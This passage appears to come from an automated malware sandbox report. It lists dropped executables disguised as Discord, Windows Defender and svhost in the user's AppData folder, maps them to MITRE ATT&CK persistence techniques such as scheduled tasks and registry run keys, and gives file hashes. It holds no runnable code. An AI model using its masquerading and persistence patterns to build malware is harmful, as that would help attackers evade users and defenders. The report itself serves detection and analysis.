C:\Users\Admin\AppData\Roaming\discord.exeC:\Users\Admin\AppData\Roaming\discord.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1636
-
-
C:\Users\Admin\AppData\Roaming\WindowsDefender.exeC:\Users\Admin\AppData\Roaming\WindowsDefender.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1412
-
-
C:\Users\Admin\AppData\Roaming\svhost.exeC:\Users\Admin\AppData\Roaming\svhost.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2096
-
-
C:\Users\Admin\AppData\Roaming\Discord_Update.exeC:\Users\Admin\AppData\Roaming\Discord_Update.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2952
-
-
C:\Users\Admin\AppData\Roaming\discord.exeC:\Users\Admin\AppData\Roaming\discord.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2976
-
-
C:\Users\Admin\AppData\Roaming\WindowsDefender.exeC:\Users\Admin\AppData\Roaming\WindowsDefender.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1700
-
-
C:\Users\Admin\AppData\Roaming\svhost.exeC:\Users\Admin\AppData\Roaming\svhost.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2616
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
357B
MD5a2b76cea3a59fa9af5ea21ff68139c98
SHA135d76475e6a54c168f536e30206578babff58274
SHA256f99ef5bf79a7c43701877f0bb0b890591885bb0a3d605762647cc8ffbf10c839
SHA512b52608b45153c489419228864ecbcb92be24c644d470818dfe15f8c7e661a7bcd034ea13ef401f2b84ad5c29a41c9b4c7d161cc33ae3ef71659bc2bca1a8c4ad
-
Filesize
76KB
MD5f06a94a34022abd760b14c7f9712edf3
SHA1736b33bcaac66b9de20abc73913583052b247a1d
SHA256670d45bff8bb640d0d0945c42630cd5a385477c1d0b02789f328bbca71df793b
SHA5126539282dcd9d54509c4967d5e0ec05cce0f32c9921ffae50d314f0e0c4e006e5a6efd30e30146a54405dfe1088aee8c6a0d39febc4796dc8639c1eaf6184d856
-
Filesize
1KB
MD53f567e100b2e5a14bdc295b9d0b2aa87
SHA17aa71b21920187bc186d13dee800a67b988cbbe4
SHA25607c79cb173f955df36e220279145c43f27c3ec70c50b551f198b429d62f13673
SHA51264fd7de9b06af5650c349b249bbb3a4d7edf28f4d898bcb1eba976abcc191adb390261ebd6f831e64e1821333daeb94016785c2164f86f30b8be77ec4b1181dc
-
Filesize
78KB
MD596de307a20d164e286dc6f9d576243ac
SHA1a04ea83541d793242a8ac298193228b180b45ac9
SHA256ccf5c48559a9010f280a669e104e0a7158c8f0f11326064687e7c04fcbc1b282
SHA5123a8c7db311a078b15bf5e486f04d42f22fb2d2430339e5fbe94543c8e39eb8829eee2befbcf89b93c0db24fd46c1bda1190bf122a0476a1dc00854bc02c2864c
-
Filesize
61KB
MD5f9c401f094879541dc43fe2e1be6598b
SHA14164f2b5b0d538b31a6bd98943bdb4f00950c5b8
SHA25693c8db705f405b9145677f69b4a396369c39a04cf87502ea94ac56e373267aac
SHA512a70d9be58c7b873a7b91054e3290a23bba0e47a207494d84a0dffbbe310c5791fe1038e506d183d891fd3a39b0dd1a55869b751a735fa9923fe9ae4ab8c52909
-
Filesize
98KB
MD522f92d02b03f4c7027e27b8e9dc8c5a9
SHA11d0df57ce658e213ff66b3e619620e4b2b312cb6
SHA2563134b8ccd158b31c28d489023ea9d62691d563f9b9dd107e8e64dda6088a6199
SHA512dc0a52a1fdc61b5c82cb1886a7e67a7b7d6fc309fe7e75fcc2588b6891902fb52271521a432a59a2e9bc93e6df82b5a4fb1d5a5715de808808734099985f3750
-
Filesize
171KB
MD53d5ea2f503c390dd7285b72915dc366f
SHA1f62b85a917d7f98469c040af63132d5aee7a375b
SHA256017471b298fac8758de30a3ced121531a75a67670bc2e7d581c56606b6a337f1
SHA512d005b12a9e18edc333af4b839ca4f611946df130685035a4c6eeb9f3c3f880ce13654f33c909d02a232045c9628e6df0626cd14b9e87327ba57591dee9bb98c9
-
Filesize
72KB
MD51f7c0615295d2c2c80a34738617a62dd
SHA1846329a7fc0f9aca346909decf282244cb6701e0
SHA25611e622baa1481b2cc65c69b2cd93fa62e884dc33a680f907f6b079c735b790fe
SHA512827d639f43524ca216fdec489c04c6a1fb01c3f1e6873b17eb61e018f0317a395bb64a242915b89696a3487990cf854420dba130e94e430e180cb316d71c4244
-
Filesize
903KB
MD5065d393fc49f68ddb101aec6b97bee49
SHA1c3844c19b60ea39eade055660a3dd3934e0a2d96
SHA256125634fb6ef6029bad99024cd4c8f0838cb086d4f071200b56bd58eec6e74127
SHA5121f72124b73f7670db5c21ca23d0835731c0001471551e17cc19a4c356db3a03a43eaf07df2b2a67ff2f438e3aa6b1dd01bbb937600b75033d7381339e8f0474e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5881135dd2a0378d3fc1c00d5ac23fd9d
SHA183b781e8571e84998b0d7937eeb7a8923a1fdee7
SHA2566e32be05a21ed780ae2bb4e86c2ae4a10b8fbd3021920eeb2b0b434bfb822bb7
SHA512b245c3870d890fe5fc8814a38e7c29432ace397cf4a4d569c1daaad8e8821c514497c243add91db56e40bab810f4cc4470697998512a657f6fcce482caec6724
-
Filesize
633B
MD5ebe35d6819eeaccef40578d2e5b51263
SHA145dc56fff59a1a5d8f3131eec627c2c17cf8bfbb
SHA2568f829ff745d96375b8d8b64097fee3fe477ea18ede3f3abc549986ce27b81e6c
SHA512b1ab95dafca33fdbd2f0718046026a6314f512177a3dd39bba9fa5742a1cb29d200e0cb8c2f8382bcabf896af64f6c1e6c06ee736015c85bb7031b948804e250
-
Filesize
19.2MB
MD51b10ac7f9574310ec8d3f4816c2832d9
SHA1daba65e48b4f8b2c1b61b6cf91fc6e2f36fe1892
SHA2564990c4e127c5ce86306dc3774862034cdc54a7b5c31fb536179faacf4adbd8b8
SHA512f5123ece8328e4ca2340deecf3386e0b3b926ec2be94625970b1f2ed1f04d81effb2bddeeafdf47fc2266d2e9d823a0a6aa431eb0287c76df933194b9de02270
-
Filesize
456B
MD53a027298558ab19b65d90b9f560f6df2
SHA1816938f082f384e2d8c750bc08deea4f13bd4b8c
SHA25666b54aca4d5098b2491173976f050b7bb44baa98e1fe522f8ba12f4caa0a2a15
SHA512dc78cb3f9654ea27066b74fe0a83b2158508c1f6931f71b9f36edc21a263bd51afda73ea2879c20510e637b824b848549a8af544d86fee22056c5328d1ca9429
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
208KB
MD52b14ae8b54d216abf4d228493ceca44a
SHA1d134351498e4273e9d6391153e35416bc743adef
SHA2564e1cc3da1f7bf92773aae6cffa6d61bfc3e25aead3ad947f6215f93a053f346c
SHA5125761b605add10ae3ef80f3b8706c8241b4e8abe4ac3ce36b7be8a97d08b08da5a72fedd5e976b3c9e1c463613a943ebb5d323e6a075ef6c7c3b1abdc0d53ac05
-
Filesize
349B
MD556334685c817f5ee77414eae74b33882
SHA1bd099b564a7198036b2748c0606730215ba509e7
SHA2567e6c42151298dbe7360bf31a3a61dcc44f9cd775d335803e0a15857da32435af
SHA51276eda4a7ef17daf583d9d96c1ecee7de71b04de3aa03ef526a70c798404d13b07ecb1c38129d0531aea2728b97914b20049252f0b8fe465ff9066f1c82c18a6c
-
Filesize
676B
MD52289bb0eeacea620909b0e7970a7fe7e
SHA165533a5391eb46ab05e58b2c9193cb27606cf7a2
SHA256b0fba38ecbd5c35a1dec53353da042a70caea9221a58a1239c8d60b6f01878c8
SHA51241050641949471591b748ffaaa7a8cec336b42c32b1b9ac7c1a8b7ce8ed3e80ae2f555d72ed44a33b8aecc82d694dd0395058bc4d3960beb1568aa92cd55fa96
-
Filesize
1.4MB
MD569d4f13fbaeee9b551c2d9a4a94d4458
SHA169540d8dfc0ee299a7ff6585018c7db0662aa629
SHA256801317463bd116e603878c7c106093ba7db2bece11e691793e93065223fc7046
SHA5128e632f141daf44bc470f8ee677c6f0fdcbcacbfce1472d928576bf7b9f91d6b76639d18e386d5e1c97e538a8fe19dd2d22ea47ae1acf138a0925e3c6dd156378
-
Filesize
17.7MB
MD5dacf5de38fc04e84539fbb83324e6718
SHA1b9a64a1e06dda01619b53bbee67e0b0c0278b589
SHA256c8ba652f285cbf4e5af985b5a001cec86afa916236f930500d6ea7c206a1620e
SHA5124d42b6d8196f8f8d0f38f9935ad05cd439b7f0a3f5b97dbb914bc083f6e78a9a748647545989b98e7c6df2293de50ce09afdec1e4a03a1a6d70aa778f1180626